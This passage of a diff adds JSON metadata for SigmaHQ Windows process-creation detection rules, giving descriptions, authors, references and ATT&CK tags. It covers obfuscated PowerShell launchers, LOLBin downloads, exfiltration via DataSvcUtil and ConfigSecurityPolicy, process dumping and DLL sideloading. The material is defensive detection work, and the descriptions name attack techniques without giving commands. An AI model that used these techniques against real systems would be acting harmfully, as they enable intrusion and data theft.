"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "4bf943c6-5146-4273-98dd-e958fd1e3abf", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation" + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_stdin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "6c96fc76-0eb1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation STDIN+ Launcher" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_var.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "27aec9c9-dbb0-4939-8422-1742242471d0", + "value": "Invoke-Obfuscation VAR+ Launcher" + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_compress.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_compress.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_rundll.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_rundll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "056a7ee1-4853-4e67-86a0-3fd9ceed7555", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_stdin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "9c14c9fa-1a63-4a64-8e57-d19280559490", + "value": "Invoke-Obfuscation Via Stdin" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_use_clip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "value": "Invoke-Obfuscation Via Use Clip" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_use_mhsta.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ac20ae82-8758-4f38-958e-b44a3140ca88", + "value": "Invoke-Obfuscation Via Use MSHTA" + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2019/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_use_rundll32.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "36c5146c-d127-4f85-8e21-01bf62355d5a", + "value": "Invoke-Obfuscation Via Use Rundll32" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_var.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION" + }, + { + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/08", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_iox.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/EddieIvan01/iox", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iox.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "d7654f02-e04b-4934-9838-65c46f187ebc", + "value": "IOX Tunneling Tool" + }, + { + "description": "Detect the use of Jlaive to execute assemblies in a copied PowerShell", + "meta": { + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "creation_date": "2022/05/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_jlaive_batch_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", + "https://github.com/ch2sh/Jlaive", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_jlaive_batch_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "value": "Jlaive Usage For Assembly Execution In-Memory" + }, + { + "description": "Detects the use of Ldifde.exe with specific command line arguments to potentially load an LDIF file containing HTTP-based arguments.\nLdifde.exe is present, by default, on domain controllers and only requires user-level authentication to execute.\n", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/09/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_ldifde_file_load.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1564968845726580736", + "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "value": "Suspicious Ldifde Command Usage" + }, + { + "description": "Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/06/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lethalhta.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://codewhitesec.blogspot.com/2018/07/lethalhta.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lethalhta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.005" + ] + }, + "uuid": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "value": "MSHTA Spwaned by SVCHOST" + }, + { + "description": "Local accounts, System Owner/User discovery using operating systems utilities", + "meta": { + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate administrator or user enumerates local users for legitimate reason" + ], + "filename": "proc_creation_win_local_system_owner_account_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_local_system_owner_account_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "attack.t1087.001" + ] + }, + "uuid": "502b42de-4306-40b4-9596-6f590c81f073", + "value": "Local Accounts Discovery" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_logmein.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logmein.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "d85873ef-a0f8-4c48-a53a-6b621f11729d", + "value": "Use of LogMeIn Remote Access Software" + }, + { + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "meta": { + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "creation_date": "2019/01/12", + "falsepositive": [ + "Exclude legitimate logon scripts" + ], + "filename": "proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1037/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml" + ], + "tags": [ + "attack.t1037.001", + "attack.persistence" + ] + }, + "uuid": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "value": "Logon Scripts (UserInitMprLogonScript)" + }, + { + "description": "This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbins_by_office_applications.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", + "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", + "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "23daeb52-e6eb-493c-8607-c4f0246cb7d8", + "value": "New Lolbin Process by Office Applications" + }, + { + "description": "This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed.", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbins_with_wmiprvse_parent_process.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_with_wmiprvse_parent_process.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "value": "Lolbins Process Creation with WmiPrvse" + }, + { + "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/09", + "falsepositive": [ + "Legitimate usage of Adplus" + ], + "filename": "proc_creation_win_lolbin_adplus.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", + "https://twitter.com/nas_bench/status/1534916659676422152", + "https://twitter.com/nas_bench/status/1534915321856917506", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1003.001" + ] + }, + "uuid": "2f869d59-7f6a-4931-992c-cce556ff2d53", + "value": "Use of Adplus.exe" + }, + { + "description": "Execute C# code with the Build Provider and proper folder structure in place.", + "meta": { + "author": "frack113", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_aspnet_compiler.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "value": "Suspicious aspnet_compiler.exe Execution" + }, + { + "description": "Performs execution of specified file, can be used for defensive evasion.", + "meta": { + "author": "frack113", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_bash.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Bash/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "5edc2273-c26f-406c-83f3-f4d948e740dd", + "value": "Suspicious Subsystem for Linux Bash Execution" + }, + { + "description": "Detects when a user downloads file by using CertOC.exe", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/05/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_certoc_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "value": "Suspicious File Download via CertOC.exe" + }, + { + "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "creation_date": "2020/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "value": "Custom Class Execution via Xwizard" + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_cl_invocation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "value": "Execution via CL_Invocation.ps1" + }, + { + "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", + "meta": { + "author": "frack113", + "creation_date": "2022/05/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_cl_loadassembly.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", + "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", + "value": "CL_LoadAssembly.ps1 Proxy Execution" + }, + { + "description": "Detects the use of a Microsoft signed script to execute commands", + "meta": { + "author": "oscd.community, Natalia Shornikova, frack113", + "creation_date": "2022/05/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "value": "CL_Mutexverifiers.ps1 Proxy Execution" + }, + { + "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", + "meta": { + "author": "frack113", + "creation_date": "2021/11/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_cmdl32.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/", + "https://twitter.com/SwiftOnSecurity/status/1455897435063074824", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "f37aba28-a9e6-4045-882c-d5004043b337", + "value": "Suspicious Cmdl32 Execution" + }, + { + "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567" + ] + }, + "uuid": "1f0f6176-6482-4027-b151-00071af39d7e", + "value": "Suspicious ConfigSecurityPolicy Execution" + }, + { + "description": "Adversaries can abuse of C:\\Windows\\System32\\gatherNetworkInfo.vbs script along with cscript.exe to gather information about the target", + "meta": { + "author": "blueteamer8699", + "creation_date": "2022/01/03", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_lolbin_cscript_gathernetworkinfo.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cscript_gathernetworkinfo.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1615", + "attack.t1059.005" + ] + }, + "uuid": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "value": "GatherNetworkInfo.vbs Script Usage" + }, + { + "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_customshellhost.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/180", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "84b14121-9d14-416e-800b-f3b829c5a14d", + "value": "Suspicious CustomShellHost Execution" + }, + { + "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", + "meta": { + "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", + "creation_date": "2021/09/30", + "falsepositive": [ + "DataSvcUtil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", + "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567" + ] + }, + "uuid": "e290b10b-1023-4452-a4a9-eb31a9013b3a", + "value": "LOLBAS Data Exfiltration by DataSvcUtil.exe" + }, + { + "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lolbin_device_credential_deployment.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/147", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "value": "DeviceCredentialDeployment Execution" + }, + { + "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Very Possible" + ], + "filename": "proc_creation_win_lolbin_diantz_ads.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", + "value": "Suspicious Diantz Alternate Data Stream Execution" + }, + { + "description": "Download and compress a remote file and store it in a cab file on local machine.", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "185d7418-f250-42d0-b72e-0c8b70661e93", + "value": "Suspicious Diantz Download and Compress Into a CAB File" + }, + { + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/09/20", + "falsepositive": [ + "Windows installed on non-C drive" + ], + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "value": "Xwizard DLL Sideloading" + }, + { + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "meta": { + "author": "Austin Songer @austinsonger, Florian Roth", + "creation_date": "2021/11/26", + "falsepositive": [ + "Dump64.exe in other folders than the excluded one" + ], + "filename": "proc_creation_win_lolbin_dump64.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1460597833917251595", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "129966c9-de17-4334-a123-8b58172e664d", + "value": "Suspicious Dump64.exe Execution" + }, + { + "description": "Adversaries can abuse winget to download payloads remotely and execute them without touching disk. Winget will be included by default in Windows 10 and is already available in Windows 10 insider programs. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe's, msi, msix 